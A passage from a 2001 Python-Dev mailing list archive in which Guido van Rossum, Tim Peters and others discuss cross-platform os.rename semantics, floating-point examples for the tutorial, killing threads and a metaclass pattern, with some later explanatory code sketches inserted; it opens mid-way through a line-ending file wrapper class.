            self.LineSep = os.linesep # a string attribute, not a function
        elif LineEndingType == "dos":
            self.LineSep = "\r\n"
        elif LineEndingType == "posix" or LineEndingType == "unix" :
            self.LineSep = "\n"
        elif LineEndingType == "mac":
            self.LineSep = "\r"
        else:
            self.LineSep = LineEndingType
        
        ## some attributes
        self.closed = 0
        self.mode = flags
        self.softspace = 0
        if LineBufferSize:
            self._BufferSize = LineBufferSize
        else:
            self._BufferSize = 100

    def readline(self):
        start_pos = self._file.tell()
        ##print "Current file position is:", start_pos
        line = ""
        TotalBytes = 0
        Buffer = self._file.read(self._BufferSize)
        while Buffer:
            ##print "Buffer = ",repr(Buffer)
            newline_pos = Buffer.find("\n")
            return_pos  = Buffer.find("\r")
            if return_pos == newline_pos-1 and return_pos >= 0: # we have a DOS line
                line = Buffer[:return_pos]+ "\n"
                TotalBytes = newline_pos+1
                break
            elif ((return_pos < newline_pos) or newline_pos < 0 ) and return_pos >=0: # we have a Mac line
                line = Buffer[:return_pos]+ "\n"
                TotalBytes = return_pos+1
                break
            elif newline_pos >= 0: # we have a Posix line
                line = Buffer[:newline_pos]+ "\n"
                TotalBytes = newline_pos+1
                break
            else: # we need a larger buffer
                NewBuffer = self._file.read(self._BufferSize)
                if NewBuffer:
                    Buffer = Buffer + NewBuffer
                else: # we are at the end of the file, without a line ending.
                    self._file.seek(start_pos + len(Buffer))
                    return Buffer

        self._file.seek(start_pos + TotalBytes)
        return line

    def readlines(self,sizehint = None):
        """

        readlines acts like the regular readlines, except that it
        understands any of the standard text file line endings ("\r\n",
        "\n", "\r").

        If sizehint is used, it will read a maximum of that many
        bytes. It will not round up, as the regular readlines does. This
        means that if sizehint is less than the length of the
        next line, you won't get anything.

        """
        
        if sizehint:
            Data = self._file.read(sizehint)
        else:
            Data = self._file.read()

        if len(Data) == sizehint:
            #print "The buffer is full"
            FullBuffer = 1
        else:
            FullBuffer = 0
        Data = Data.replace("\r\n","\n").replace("\r","\n")
        Lines = [line + "\n" for line in Data.split('\n')]
        #print Lines
        ## If the last line is only a linefeed it is an extra line
        if Lines[-1] == "\n":
            del Lines[-1]
        ## if it isn't then the last line didn't have a linefeed, so we need to remove the one we put on.
        else:
            ## or it's the end of the buffer
            if FullBuffer:
                #print "the file is at:",self._file.tell()
                #print "the last line has length:",len(Lines[-1])
                self._file.seek(-(len(Lines[-1])-1),1) # reset the file position
                del(Lines[-1])
            else:
                Lines[-1] = Lines[-1][:-1]
        return Lines

    def readnumlines(self,NumLines = 1):
        """

        readnumlines is an extension to the standard file object. It
        returns a list containing the number of lines that are
        requested. I have found this to be very useful, and it allows me to avoid the many loops like:

        lines = []
        for i in range(N):
            lines.append(file.readline())

        Also, If I ever get around to writing this in C, it will provide a speed improvement.

        """
        Lines = []
        while len(Lines) < NumLines:
            Lines.append(self.readline())
        return Lines

    def read(self,size = None):
        """
     
        read acts like the regular read, except that it translates any of
        the standard text file line endings ("\r\n", "\n", "\r") into a
        "\n"
        
        If size is used, it will read a maximum of that many bytes,
        before translation. This means that if the line endings have
        more than one character, the size returned will be smaller. This
        could be patched, but it didn't seem worth it. If you want that
        much control, use a binary file.
      
        """
        
        if size:
            Data = self._file.read(size)
        else:
            Data = self._file.read()
            
        return Data.replace("\r\n","\n").replace("\r","\n")
    
    def write(self,string):
        """

        write is just like the regular one, except that it uses the line
          separator specified when the file was opened for writing or
          appending.


        """
        self._file.write(string.replace("\n",self.LineSep))

    def writelines(self,list):
        for line in list:
            self.write(line)
        

    # The rest of the standard file methods mapped
    def close(self):
        self._file.close()
        self.closed = 1
    def flush(self):
        self._file.flush()
    def fileno(self):
        return self._file.fileno()
    def seek(self,offset,whence = 0):
        self._file.seek(offset,whence)
    def tell(self):
        return self._file.tell()
    

--------------B9643430766B782E71A5BE98--


From guido@digicool.com  Wed May 23 00:46:53 2001
From: guido@digicool.com (Guido van Rossum)
Date: Tue, 22 May 2001 19:46:53 -0400
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: Your message of "Tue, 22 May 2001 16:54:42 CDT."
 <15114.57378.887742.531145@beluga.mojam.com>
References: <15114.57378.887742.531145@beluga.mojam.com>
Message-ID: <200105222346.f4MNkr104833@odiug.digicool.com>

> It was brought to my attention a week ago by a client that os.rename
> semantics differ between Unix and Windows.  On Unix, if the destination file
> already exists it is silently deleted.  On Windows, an exception is raised.
> I was able to verify this for Python 2.0 on Windows98.  I assume nothing
> changed for 2.1, but I can't verify that.

I've always known this, and assumed it was common knowledge.
Sorry. ;-)

> (Windows trashed my partition
> table and my Linux root partition while I was downloading 2.1.
> Consequently, I no longer run Windows.  Take that, Bill...)  I haven't
> checked the Mac yet (will do that when I get back to the US), but I think
> that os.rename should have the same semantics across all platforms.  To the
> extent reasonably possible, I think this should also be true of other common
> functions exposed through the os module.
> 
> On the (unsupportable) theory that to-date, more Python apps have been
> written and/or deployed on Unix-like systems and that where Windows apps are
> concerned, many developers will have added a thin wrapper to mimic the Unix
> semantics, I think less breakage would result if the Unix semantics were
> implemented in the Windows version.  It appears that is what POSIX
> compliance would demand as well.
> 
> Skip

I certainly wouldn't want to try to emulate the Windows semantics on
Unix.  However, I think that emulating the correct Posix semantics on
Windows is not possible either.  The Posix rename() call guarantees
that it is atomic: there is no point in time where the file doesn't
exist at all (and a system or program crash can't delete the file).  I
wouldn't know how to do that in Windows -- the straightforward version

    if os.path.exists(target):
        os.unlink(target)
    os.rename(source, target)

leaves a vulnerability open where the target doesn't exist and if at
that point the system crashes or the program is killed, you lose the
target.

I would prefer to document the difference so applications can decide
how to deal with this.
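Later Python versions (3.3 and up) added os.replace(), which overwrites an existing destination on every platform. On POSIX systems it is a plain rename() and keeps the atomicity described above. Whether Windows gives the same guarantee is worth checking in the documentation for the version at hand. Here is a sketch using it; the helper name and temporary files are illustrative:

```python
import os
import tempfile


def replace_file(source, target):
    """Move source over target, replacing target if it already exists."""
    # Unlike the exists/unlink/rename snippet above, the program itself
    # never deletes target before the rename happens.
    os.replace(source, target)


with tempfile.TemporaryDirectory() as d:
    src = os.path.join(d, "new.txt")
    dst = os.path.join(d, "current.txt")
    with open(src, "w") as f:
        f.write("new contents")
    with open(dst, "w") as f:
        f.write("old contents")
    replace_file(src, dst)
    with open(dst) as f:
        result = f.read()
    source_gone = not os.path.exists(src)

print(result, source_gone)  # prints "new contents True"
```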

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@digicool.com  Wed May 23 00:50:29 2001
From: guido@digicool.com (Guido van Rossum)
Date: Tue, 22 May 2001 19:50:29 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Your message of "Tue, 22 May 2001 14:44:09 PDT."
 <Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain>
References: <Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain>
Message-ID: <200105222350.f4MNoUj04853@odiug.digicool.com>

> Who was it that said every equation will halve your audience?

Einstein.

> I agree with that, the tutorial should try to be as broad and simple
> as possible.

But keep in mind that the particular Python tutorial we're talking
about is intended for an audience of folks who already know how to
program.  I vote against dumbing this down.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From michel@digicool.com  Wed May 23 01:17:59 2001
From: michel@digicool.com (Michel Pelletier)
Date: Tue, 22 May 2001 17:17:59 -0700 (PDT)
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <200105222350.f4MNoUj04853@odiug.digicool.com>
Message-ID: <Pine.LNX.4.21.0105221712250.22109-100000@localhost.localdomain>

On Tue, 22 May 2001, Guido van Rossum wrote:

> > I agree with that, the tutorial should try to be as broad and simple
> > as possible.
> 
> But keep in mind that the particular Python tutorial we're talking
> about is intended for an audience of folks who already know how to
> program.  I vote against dumbing this down.

Now that I've actually read the tutorial (wink) I see the true target
audience.  For some reason, I thought it was oriented more toward the CP4E
audience.

Is there a python "children's book" complete with big red dogs and rabbits
in waistcoats?  That would be an interesting project...

-Michel


From guido@digicool.com  Wed May 23 01:20:25 2001
From: guido@digicool.com (Guido van Rossum)
Date: Tue, 22 May 2001 20:20:25 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Your message of "Tue, 22 May 2001 17:17:59 PDT."
 <Pine.LNX.4.21.0105221712250.22109-100000@localhost.localdomain>
References: <Pine.LNX.4.21.0105221712250.22109-100000@localhost.localdomain>
Message-ID: <200105230020.f4N0KPU05103@odiug.digicool.com>

> Is there a python "children's book" complete with big red dogs and rabbits
> in waistcoats?  That would be an interesting project...

See http://www.python.org/sigs/edu-sig/ and
http://www.python.org/doc/Intros.html (the latter has a section with
intros for non-programmers).

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@home.com  Wed May 23 01:23:42 2001
From: tim.one@home.com (Tim Peters)
Date: Tue, 22 May 2001 20:23:42 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEOCKDAA.tim.one@home.com>

I struggled with a way to do a better job of explaining this stuff last
night.  As I see others have already said, the Tutorial is not aimed at script
kiddies, or non-programmers, or even programming newbies, but at programmers
who are simply new to Python.  So everything I put in the tutorial was either
jarringly out of place, or inadequate to address the audience you (Michel)
have in mind.  But I agree that's an important audience, and I spend a fair
chunk of my life now anyway explaining this stuff over & over to those who
think computing a ratio of two integers is akin to solving fourth order
differential equations <wink>.

In the end I decided to write a Tutorial Appendix in a much gentler style.
It doesn't really fit with the rest of the Tutorial, but then that's *why*
it's an Appendix.  The patch is here:

    http://sourceforge.net/tracker/index.php?func=detail&
        aid=426208&group_id=5470&atid=305470

I also changed the tutorial fp examples so they have an excellent chance of
displaying the same strings across all platforms, and even if Python 10K
defaults to decimal floating-point someday (perhaps in the year 10000, as its
name suggests).


From gward@python.net  Wed May 23 01:33:11 2001
From: gward@python.net (Greg Ward)
Date: Tue, 22 May 2001 20:33:11 -0400
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: <200105222346.f4MNkr104833@odiug.digicool.com>; from guido@digicool.com on Tue, May 22, 2001 at 07:46:53PM -0400
References: <15114.57378.887742.531145@beluga.mojam.com> <200105222346.f4MNkr104833@odiug.digicool.com>
Message-ID: <20010522203311.E1245@gerg.ca>

On 22 May 2001, Guido van Rossum said:
> I would prefer to document the difference so applications can decide
> how to deal with this.

I agree -- it has always seemed to me that the standard library merely
exposes the underlying OS functionality for you.  This puts portability
somewhat in the hands of the application writer -- with power comes
responsibility.  I think that's the way it should be; any attempt to
convert OS A to the semantics of OS B will fall down somewhere.  Witness
the loss-of-atomicity in Guido's example.  I'm sure any other semantic
difference between OSes would have similar "gotchas" if we attempted to
paper over them.

        Greg
-- 
Greg Ward - just another Python hacker                  gward@python.net
http://starship.python.net/~gward/
Beware of altruism.  It is based on self-deception, the root of all evil.


From tim.one@home.com  Wed May 23 07:31:29 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 23 May 2001 02:31:29 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <20010522094157.A1245@gerg.ca>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEONKDAA.tim.one@home.com>

[Greg Ward, on http://www.lahey.com/float.htm]

> I found this article more useful, interesting, and informative than
> whatever I learned about binary floating-point in my academic years.
> Good link, Tim.  Two catches:
>
>   * I can just barely follow the FORTRAN examples; I very much doubt
>     the average Python newbie would have any more luck than me

The goal is to frighten them:  the ones with the right stuff to use fp
without destroying a satellite, bringing down the Internet, designing a
pacemaker that fails when rounding a corner clockwise at 1.37g, causing a
small country's economy to collapse, making jet fighters spontaneously turn
upside down when crossing the equator, or triggering WW III by accident, will
persist <wink>.  BTW, not all of those were made up!

>   * I tried several of the FORTRAN examples in Python, and did not
>     witness any of the gotchas they are meant to illustrate.  Possibly
>     it's just single-precision vs. double-precision difference, but
>     Python 2.1 under Linux 2.2 on an Athlon compiled with gcc 2.95.2
>     doesn't demonstrate the same gotchas as that article does.

You can't illustrate the last half of their examples in Python without
playing obscure games with the struct module, because they rely on the
existence of more than one size of floating-point type.

Your lack of luck with the first half of their examples is indeed solely due
to the fact that he used single-precision examples while Python's float is double.  You
need to find different numbers to show the same things in Python; like so:

# Binary Floating Point
x = 100000000000. * 0.00000000001
if x != 1.0:
    print "Oops!  It's %r" % x

# Inexactness
a = 98. / 49.
reciprocal = 1./49.
b = 98. * reciprocal
if a != b:
    print "Oops!  They're %r and %r" % (a, b)

# Crazy Conversions
x = 32.05
y = x * 100. # "looks like" 3205. if display rounded
i = int(y)   # actually truncates to 3204
print y, i, repr(y)
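The second and third points can also be checked in Python 3 without reading digits by eye. This is a sketch that assumes Python 3's decimal and fractions modules, both of which convert a float to its exact binary value.

Why 32.05 truncates: the double nearest 32.05 sits slightly below it. The product with 100 therefore lands just under 3205.

```python
from decimal import Decimal
from fractions import Fraction

# Inexactness: 98/49 is a single correctly rounded division (exactly 2.0),
# while 98 * (1/49) rounds twice, and the second rounding misses 2.0.
a = 98.0 / 49.0
b = 98.0 * (1.0 / 49.0)
print(a == b, repr(a), repr(b))

# Crazy Conversions: the stored value of 32.05 is slightly too small,
# so x * 100 comes out just under 3205 and int() truncates toward zero.
x = 32.05
print(Decimal(x))                     # exact value actually stored
print(Decimal(x) < Decimal("32.05"))  # the stored value is below 32.05
y = x * 100.0
print(repr(y), int(y), round(y))      # round() recovers 3205, int() does not

# Fraction(float) is exact too: 0.1 is not one tenth in binary.
print(Fraction(0.1) == Fraction(1, 10))
```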

It's Real Work coming up with stuff like that.  What I'm hearing is that
people won't understand it anyway -- so screw it.  If they want an education,
they can prove it by doing a google search <0.6 wink>.


From tim.one@home.com  Wed May 23 07:44:14 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 23 May 2001 02:44:14 -0400
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: <200105222346.f4MNkr104833@odiug.digicool.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEOOKDAA.tim.one@home.com>

[Guido]
> ...
> I certainly wouldn't want to try to emulate the Windows semantics on
> Unix.  However, I think that emulating the correct Posix semantics on
> Windows is not possible either.

Neither is it desirable:  Windows isn't POSIX, and Windows users would be
appalled if os.rename() could silently destroy files.  If such a function
needs to exist, create a new cowboy_unix_tricks module instead <wink>.

This has never been a problem for me because I always check to see whether
the target file exists before using os.rename(), and do something else if it
does.  I understand that's vulnerable to races, but nobody asked whether I
cared about that <wink>.

> The Posix rename() call guarantees that it is atomic: there is no
> point in time where the file doesn't exist at all (and a system or
> program crash can't delete the file).  I wouldn't know how to do
> that in Windows -- the straightforward version
>
>     if os.path.exists(target):
>         os.unlink(target)
>     os.rename(source, target)
>
> leaves a vulnerability open where the target doesn't exist and if at
> that point the system crashes or the program is killed, you lose the
> target.

More obviously, it also fails if target simply exists and is open (you can't
unlink an open file on Windows).

Nevertheless, you can do this renaming safely on Windows, by doing the right
system magic to make rename happen at reboot time before Windows actually
starts.  But I'm not sure Skip's client would want to reboot each time Python
did a file rename <wink>.

> I would prefer to document the difference so applications can decide
> how to deal with this.

Yup!


From MarkH@ActiveState.com  Wed May 23 09:55:17 2001
From: MarkH@ActiveState.com (Mark Hammond)
Date: Wed, 23 May 2001 18:55:17 +1000
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEONKDAA.tim.one@home.com>
Message-ID: <LCEPIIGDJPKCOIHOBJEPIELMDNAA.MarkH@ActiveState.com>

[Tim on a subject near and dear to his testicles]

> It's Real Work coming up with stuff like that.  What I'm hearing is that
> people won't understand it anyway -- so screw it.  If they want an education,
> they can prove it by doing a google search <0.6 wink>.

I am inclined to agree.

IMO, The Python tutorial or other documentation should include a basic
example of these "errors", and a link to _either_ of the HTML pages
referenced in this thread as an optional extra.

Just enough to stop _most_ of the "this is a bug" posts - but stopping well
short of any attempt to "educate" them in floating point madness.  Just
_one_ example of floats not being exact would suffice.

Going from my personal experience, I learnt long ago that floating point is
not exact.  That is all I needed to know to move on.  I didn't like it, and
I didn't understand exactly why (I thought I did, but Tim put a stop to that
misconception <wink>), but I could move on once I had that skerrick of
enlightenment.  And believe it or not, some of my code _does_ use floats,
and _does_ work! (well, works as well as the rest of my code anyway <wink>)

And-it-wasn't-even-Python-that-taught-me,

Mark.


From pf@artcom-gmbh.de  Wed May 23 08:49:13 2001
From: pf@artcom-gmbh.de (Peter Funk)
Date: Wed, 23 May 2001 09:49:13 +0200 (MEST)
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: <15114.57947.313813.522806@cj42289-a.reston1.va.home.com> from "Fred
 L. Drake, Jr." at "May 22, 2001 06:04:11 pm"
Message-ID: <m152TOL-000CpwC@artcom0.artcom-gmbh.de>

Hi,

Fred L. Drake, Jr. schrieb:
> skip@pobox.com writes:
>  > On the (unsupportable) theory that to-date, more Python apps have been
>  > written and/or deployed on Unix-like systems and that where Windows apps are
>  > concerned, many developers will have added a thin wrapper to mimic the Unix
>  > semantics, I think less breakage would result if the Unix semantics were
> 
>   I don't know whether there are more deployed Python apps on Unix
> than on Windows (and I've no good idea about how to find out), but I
> think unifying the semantics one way or the other is a good thing.
> Regardless of which set of semantics is chosen.

I agree.  May I suggest to add an optional third boolean parameter to 
os.rename called 'replace', which defaults either to TRUE or FALSE, so 
modifying existing apps  will become even less hassle to potential porters.  
Here is a strawman to explain what I mean:
--------------------------------------
import os

def new_rename(src, dst, replace=0, old_rename=os.rename):
    if os.path.exists(dst):
        if replace:
            if not os.path.isdir(dst):
                os.remove(dst)
            else:
                # I'm not sure what to do here.  recursive removal?  dangerous!
                raise NotImplementedError
        else:
            raise OSError("%s already exists" % dst)
    return old_rename(src, dst)

os.rename = new_rename
--------------------------------------

Regards, Peter
-- 
Peter Funk, Oldenburger Str.86, D-27777 Ganderkesee, Germany, Fax:+49 4222950260
office: +49 421 20419-0 (ArtCom GmbH, Grazer Str.8, D-28359 Bremen, Germany)


From jack@oratrix.nl  Wed May 23 12:15:10 2001
From: jack@oratrix.nl (Jack Jansen)
Date: Wed, 23 May 2001 13:15:10 +0200
Subject: [Python-Dev] Assertion failed in dictobject.c
Message-ID: <20010523111510.D504D3B8999@snelboot.oratrix.nl>

I'm seeing the assert on line 525 in dictobject.c (revision 2.92) failing. The 
debugger tells me that ma_fill and ma_size are both 8. ma_used is 2, and 
interestingly hash is also 8.

Going back to revision 2.90 fixes the problem (or masks it).
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | ++++ see http://www.xs4all.nl/~tank/ ++++


From skip@pobox.com (Skip Montanaro)  Wed May 23 12:59:45 2001
From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro))
Date: Wed, 23 May 2001 06:59:45 -0500
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCEOOKDAA.tim.one@home.com>
References: <200105222346.f4MNkr104833@odiug.digicool.com>
 <LNBBLJKPBEHFEDALKOLCCEOOKDAA.tim.one@home.com>
Message-ID: <15115.42545.172775.716565@beluga.mojam.com>

>>>>> "Tim" == Tim Peters <tim.one@home.com> writes:

    Tim> [Guido]
    >> I would prefer to document the difference so applications can decide
    >> how to deal with this.

    Tim> Yup!

Submitted as patch #426598, assigned to Dr. Doc (aka Fred).

Skip


From skip@pobox.com (Skip Montanaro)  Wed May 23 13:11:51 2001
From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro))
Date: Wed, 23 May 2001 07:11:51 -0500
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: <m152TOL-000CpwC@artcom0.artcom-gmbh.de>
References: <15114.57947.313813.522806@cj42289-a.reston1.va.home.com>
 <m152TOL-000CpwC@artcom0.artcom-gmbh.de>
Message-ID: <15115.43271.480135.227059@beluga.mojam.com>

    Peter> I agree.  May I suggest to add an optional third boolean
    Peter> parameter to os.rename called 'replace', which defaults either to
    Peter> TRUE or FALSE, so modifying existing apps will become even less
    Peter> hassle to potential porters.

In his response to my post, Guido indicated there is a race condition.
Between the time you delete the preexisting destination file and do the
actual file rename, Windows could wink out on you, leaving you with the
original src file and no original dst file.  POSIX semantics require the
rename to be atomic.  This is just not going to be possible.

Fred, perhaps my doc mod should be enhanced to identify the race condition
for people who need to use os.rename on Windows and will be forced to first
unlink the destination file.

Skip


From guido@digicool.com  Wed May 23 14:19:24 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 23 May 2001 09:19:24 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Your message of "Wed, 23 May 2001 02:31:29 EDT."
 <LNBBLJKPBEHFEDALKOLCGEONKDAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCGEONKDAA.tim.one@home.com>
Message-ID: <200105231319.f4NDJOs06485@odiug.digicool.com>

I liked the text that Tim posted to SF, but I would like it even
better if it also *contained* the text from the "PresentationError"
moinmoin wiki page, rather than referring to it by URL.  The moinmoin
URL is not a good long-term name for that information -- printed
copies of the tutorial will persist long after the moinmoin wiki has
been moved or consolidated.  Plus, instead of referring people to the
moinmoin wiki page, I'd like to be able to refer them to the appendix
of the tutorial!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@digicool.com  Wed May 23 14:32:17 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 23 May 2001 09:32:17 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Your message of "Wed, 23 May 2001 18:55:17 +1000."
 <LCEPIIGDJPKCOIHOBJEPIELMDNAA.MarkH@ActiveState.com>
References: <LCEPIIGDJPKCOIHOBJEPIELMDNAA.MarkH@ActiveState.com>
Message-ID: <200105231332.f4NDWH706564@odiug.digicool.com>

[Mark]
> IMO, The Python tutorial or other documentation should include a basic
> example of these "errors", and a link to _either_ of the HTML pages
> referenced in this thread as an optional extra.
> 
> Just enough to stop _most_ of the "this is a bug" posts - but
> stopping well short of any attempt to "educate" them in floating
> point madness.  Just _one_ example of floats not being exact would
> suffice.

I agree: we don't have to explain *why* it happens.  We just have to
explain *that* it happens, so folks don't think they've discovered
a bug in Python.

Or maybe we could do this: in the main text, explain and show *that*
it happens, and refer to the appendix which can explain *why* it
happens to those interested, in a gentle manner like what Tim already
wrote.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@digicool.com  Wed May 23 14:52:02 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 23 May 2001 09:52:02 -0400
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: Your message of "Wed, 23 May 2001 09:49:13 +0200."
 <m152TOL-000CpwC@artcom0.artcom-gmbh.de>
References: <m152TOL-000CpwC@artcom0.artcom-gmbh.de>
Message-ID: <200105231352.f4NDq3g06738@odiug.digicool.com>

> May I suggest to add an optional third boolean parameter to
> os.rename called 'replace', which defaults either to TRUE or FALSE,
> so modifying existing apps will become even less hassle to potential
> porters.

I see no reason to change the API.

In any case, for backwards compatibility, the default would have to be
platform dependent, which strikes me as just as bad as the current
situation.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From thomas@xs4all.net  Wed May 23 15:00:25 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Wed, 23 May 2001 16:00:25 +0200
Subject: [Python-Dev] Python 2.1.1
Message-ID: <20010523160025.B690@xs4all.nl>

As those of you on python-checkins might have noticed ;) I started checking
in Python 2.1.1 bugfixes. I'd hoped to finish all of my backlog today, but
unfortunately I'm now called away on a surprise emergency meeting, so I'm not
sure if I'll make it. The 2.1.1 tree is in a somewhat unstable state right now;
I'll fix that today in any case, but after the meeting.

(As for why I started doing it: I just spent about two weeks of digging
through Pine source code, and its IMAP server in particular, and I decided I
deserved a break -- Python reads like a Heinlein novel, after pine code:
readable, straight-forward, and just enough complexity to keep it
entertaining :)

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From aahz@rahul.net  Wed May 23 15:08:45 2001
From: aahz@rahul.net (Aahz Maruch)
Date: Wed, 23 May 2001 07:08:45 -0700 (PDT)
Subject: [Python-Dev] Killing threads
Message-ID: <20010523140845.B092299C83@waltz.rahul.net>

Okay, so we all know it isn't possible to kill threads cleanly and
safely in any kind of cross-platform way.  At the same time, a program
that has a thread running haywire should be able to kill itself
completely, so that a monitoring process can restart it.  How hard would
it be to do only that in a cross-platform way?

I'm guessing that for Unix, we'd just send a hard signal (9 or 15).  No
clue what would need to happen for Windows and Mac.

(This got brought up because I experimented with os._exit() as a
possible solution, but that GPFs on Win98SE.)
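Here is a minimal sketch of the "kill yourself, let a monitor restart you" arrangement. It assumes Python 3 (subprocess.run). CHILD and supervise are hypothetical names. It has not been checked on the Windows versions mentioned above.

The child simulates a haywire non-daemon thread. An ordinary exit would wait for that thread forever, but os._exit() ends the whole process at once. The parent restarts the child after each abnormal exit.

```python
import subprocess
import sys

# Child program (hypothetical): a non-daemon thread spins forever, so a
# normal sys.exit() from the main thread would hang waiting for it.
# os._exit() ends the whole process at once, skipping cleanup handlers.
CHILD = """
import os, threading, time

def haywire():
    while True:
        time.sleep(0.01)

threading.Thread(target=haywire).start()
time.sleep(0.1)      # main thread decides the program is unhealthy
os._exit(3)          # kill every thread; report failure to the monitor
"""

def supervise(max_restarts=2):
    """Run CHILD, restarting it after each abnormal exit; return exit codes."""
    codes = []
    for _ in range(max_restarts + 1):
        proc = subprocess.run([sys.executable, "-c", CHILD])
        codes.append(proc.returncode)
        if proc.returncode == 0:
            break
    return codes
```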
-- 
                      --- Aahz (@pobox.com)

Hugs and backrubs -- I break Rule 6       <*>       http://www.rahul.net/aahz/
Androgynous poly kinky vanilla queer het Pythonista

I don't really mind a person having the last whine, but I do mind
someone else having the last self-righteous whine.


From thomas.heller@ion-tof.com  Wed May 23 18:28:07 2001
From: thomas.heller@ion-tof.com (Thomas Heller)
Date: Wed, 23 May 2001 19:28:07 +0200
Subject: [Python-Dev] New metaclass pattern (Was Re: Simulating Class (was Re: Does Python have Class methods))
References: <OF92F5AE57.7BB01157-ON88256A50.00672E1C@i2.com>
Message-ID: <020301c0e3ad$bb559790$e000a8c0@thomasnotebook>

[this message has also been posted to comp.lang.python]
Guido's metaclass hook in Python goes this way:

If a base class (let's better call it a 'base object')
has a __class__ attribute, this is called to create the
new class.

From demo/metaclasses/index.html:

class C(B):
    a = 1
    b = 2

Assuming B has a __class__ attribute, this translates into:

C = B.__class__('C', (B,), {'a': 1, 'b': 2})

Usually B is an instance of a normal class.
So the above code will create an instance of B,
call B's __init__ method with 'C', (B,), and {'a': 1, 'b': 2},
and assign the instance of B to the variable C.

Ever since then I've played with this metaclass hook, and
always run into the problem that B has to completely
simulate the normal Python behaviour for classes (modifying,
of course, whatever you want to change).

The problem is that there are a lot of successful and
unsuccessful attribute lookups, which require a lot
of overhead when implemented in Python, so the result
is very slow (too slow to be usable in some cases).

------

Python 2.1 allows attaching attributes to function objects,
so a new metaclass pattern can be implemented.

The idea is to let B be a function having a __class__ attribute
(which does _not_ have to be a class, it can again be a function).

What is the improvement?
Classes, when called, create new instances of themselves,
functions can return whatever they want.
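For comparison, Python 3 drops the base-object `__class__` trick. The class statement takes the metaclass from the bases' actual types. Instead, the `metaclass=` keyword accepts any callable, and whatever that callable returns is bound to the class name.

This is a sketch assuming Python 3. `magic` and `Spam` are hypothetical names, and this is not Thomas's MetaMixin code.

```python
def magic(name, bases, namespace):
    """Called in place of a metaclass; may return any object at all."""
    cls = type(name, bases, namespace)   # build an ordinary class...
    return cls()                         # ...but bind the name to an instance

class Spam(metaclass=magic):
    def whoami(self):
        return "whoami called on an instance of " + type(self).__name__

print(type(Spam))     # Spam is an instance, not a class
print(Spam.whoami())  # a method reachable directly through the name "Spam"
```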

I've used this pattern to realize the ideas Costas Menico
described in an article 'Simulating class' in c.l.p,
and James Althoff improved in a followup.

The proposal was to create class methods the following way:

<--- start of code --->
class Class1MetaClass: # Base for metaclass
    
    # Define "class methods" for Class1

    def whoami(self):
        print 'Class1MetaClass.whoami:', self

    # define Class1 & its "instance methods"

    class Class1: # Base class

        def whoami(self):
            print 'Class1.whoami:', self

Class1Meta = Class1MetaClass() # Make & name the singleton metaclass instance
Class1 = Class1Meta.Class1     # Make the Class1 name accessible

# define subclasses:
class Class2MetaClass(Class1MetaClass):
    [rest of code omitted]

# use them:

Class1Meta.whoami() # invoke "class method" of base class
Class1().whoami()   # make an instance & invoke "instance method"
i = Class1Meta()    # make another instance...
i.whoami()          # ...invoke "instance method"
<--- end of code --->

I find this idea very interesting, but you have
to be very verbose: define a Class1MetaClass, create
an instance to use as the metaclass, and remember to use
Class1MetaClass (and not Class2Meta!) to define
subclasses.

------

I would like (and have implemented) the following way
to create class methods. You have to supply the magic
MetaMixin object as the first object in the base class list.

class SpamClass(MetaMixin):
    # define "class methods"
    def whoami(self):
        print "SpamClass.whoami:", self

    def create(self, arg1, arg2):
        # a factory class method
        return self._instance_(arg1, arg2)

    class _instance_:
        # define "instance methods"
        def whoami(self):
            print "instance.whoami:", self

# Subclassing goes this way:

class FooClass(MetaMixin, SpamClass):
    def create(self, arg1, arg2):
        # override the factory method
        return self._instance_(arg2, arg1)

    class _instance_(SpamClass._instance_):
        # define "instance methods"
        def blah(self):
            print "blah:", self
            self.whoami()

# Test them:

print SpamClass
#prints: <test.SpamClass instance at 007C0D84>

SpamClass.whoami()
#prints: SpamClass.whoami: <test.SpamClass instance at 007C0D84>

s = SpamClass()
print s
#prints: <__main__.SpamClass_Instance instance at 007C0DAC>

s.whoami()
#prints: instance.whoami: <__main__.SpamClass_Instance instance at 007C0DAC>

------

Here is finally the code for MetaMixin:

<--- start code --->
